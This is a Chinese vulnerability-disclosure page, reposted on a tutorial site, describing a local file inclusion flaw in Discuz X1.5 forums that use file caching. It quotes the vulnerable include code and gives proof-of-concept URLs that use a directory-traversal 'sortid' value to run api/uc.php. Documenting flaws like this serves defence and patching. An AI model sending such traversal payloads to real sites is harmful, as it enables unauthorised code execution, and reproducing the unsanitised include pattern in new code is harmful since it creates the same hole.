手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >DISCUZ X1.5 本地文件包含漏洞
DISCUZ X1.5 本地文件包含漏洞
摘要:DISCUZX1.5本地文件包含,当然是有条件的,就是使用文件作为缓存。config_global.php$_config['cache']...

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

【DISCUZ X1.5 本地文件包含漏洞】相关文章:

DedeCms V5.1 tag.php注入漏洞

苹果浏览器存在文件下载远程拒绝服务漏洞

xyxcms v1.3 小游戏CMS 漏洞说明

Discuz 娱乐大厅插件V1.0 注入漏洞

Mambo index.php文件多个跨站脚本执行漏洞

雅虎通 ActiveX控件GetFile方式任意文件上传漏洞

ECShop 注射漏洞分析

Persits Software XUpload.ocx 含远程栈溢出漏洞

dedecms织梦 v5.5 两处跨站漏洞

F2blog XMLRPC 上传任意文件漏洞

精品推荐
分类导航